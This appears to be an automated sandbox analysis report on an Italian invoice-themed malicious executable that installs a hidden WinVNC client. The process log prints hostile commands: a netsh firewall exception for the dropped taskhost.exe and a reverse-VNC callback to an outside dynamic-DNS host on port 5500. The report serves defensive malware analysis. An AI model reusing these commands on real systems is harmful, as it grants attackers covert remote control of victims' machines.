ritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces

Source: C:\Games\taskhost.exe

Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A4836
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A4942
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009700AC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_00970251
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01002440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E81490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAF6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FC5910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FD7CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FD3C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01020210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EBE4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010AC5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0109A7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EB6600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EB2743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010A29F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01018800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0106CA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EC2BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0102CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01092DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EB4E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01020FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0100CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0109317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAB090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAF180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA3390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E83480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01029470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01073650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EBF740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FC3750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101DA00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F99B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F03B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E87AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101FFD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAFF50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101DEF0
Source: C:\Games\viewer.exe	Code function: 6_2_006167A0
Source: C:\Games\viewer.exe	Code function: 6_2_00640040
Source: C:\Games\viewer.exe	Code function: 6_2_0063E0E0
Source: C:\Games\viewer.exe	Code function: 6_2_00649151
Source: C:\Games\viewer.exe	Code function: 6_2_0063B1CB
Source: C:\Games\viewer.exe	Code function: 6_2_0061C340
Source: C:\Games\viewer.exe	Code function: 6_2_0063B3FD
Source: C:\Games\viewer.exe	Code function: 6_2_006367B0
Source: C:\Games\viewer.exe	Code function: 6_2_00651804
Source: C:\Games\viewer.exe	Code function: 6_2_006418B4
Source: C:\Games\viewer.exe	Code function: 6_2_00651924
Source: C:\Games\viewer.exe	Code function: 6_2_0061DD00
Source: C:\Games\viewer.exe	Code function: 6_2_0064FDE4
Source: C:\Games\viewer.exe	Code function: 6_2_00654EF0
Source: C:\Games\viewer.exe	Code function: 6_2_0061FF00
Source: C:\Games\viewer.exe	Code function: 6_2_00649F09
Source: C:\Games\taskhost.exe	Code function: 41_2_00162820
Source: C:\Games\taskhost.exe	Code function: 41_2_0015F0D0
Source: C:\Games\taskhost.exe	Code function: 41_2_001DA974
Source: C:\Games\taskhost.exe	Code function: 41_2_000BD9F0
Source: C:\Games\taskhost.exe	Code function: 41_2_001E5A2B
Source: C:\Games\taskhost.exe	Code function: 41_2_0015FA50
Source: C:\Games\taskhost.exe	Code function: 41_2_001C4362
Source: C:\Games\taskhost.exe	Code function: 41_2_001E23F9
Source: C:\Games\taskhost.exe	Code function: 41_2_001CA650
Source: C:\Games\taskhost.exe	Code function: 41_2_000BD700
Source: C:\Games\taskhost.exe	Code function: 41_2_001C3FD4

Source: C:\Games\viewer.exe	Code function: String function: 00635126 appears 56 times
Source: C:\Games\viewer.exe	Code function: String function: 00635630 appears 40 times
Source: C:\Games\viewer.exe	Code function: String function: 006350F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E8A880 appears 58 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E8AEE0 appears 67 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E887F0 appears 50 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E89320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00EA5220 appears 35 times
Source: C:\Games\taskhost.exe	Code function: String function: 000BCCB0 appears 34 times

Source: Preventivo24.01.11.exe

Static PE information: invalid certificate

Source: taskhost.exe.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: Preventivo24.01.11.exe, 00000000.00000003.1685751474.0000000007E27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1638029413.000000000120B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685248284.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685666367.0000000007E1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685503614.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B101000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe	Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Section loaded: lpk.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll

Source: Preventivo24.01.11.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: shi6E82.tmp.0.dr

Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket

Source: timeout.exe, 00000036.00000002.2263167469.0000000000658000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: .CMD;.VBP~

Source: classification engine

Classification label: mal76.rans.troj.evad.winEXE@110/77@8/5

Source: ~.pdf.0.dr

Initial sample: http://www.pdf-tools.com\

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FC0AF0 FormatMessageW,GetLastError,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF4BE0 GetDiskFreeSpaceExW,

Source: C:\Games\viewer.exe

Code function: 6_2_00613710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Games\viewer.exe

Code function: 6_2_006149C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00E8A740 LoadResource,LockResource,SizeofResource,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Games\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Local\Temp\upd65B7.tmp

Jump to behavior

Source: C:\Games\viewer.exe

Command line argument: Ae

Source: Preventivo24.01.11.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Preventivo24.01.11.exe

Virustotal: Detection: 17%

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File read: C:\Users\user\Desktop\Preventivo24.01.11.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: unknown	Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
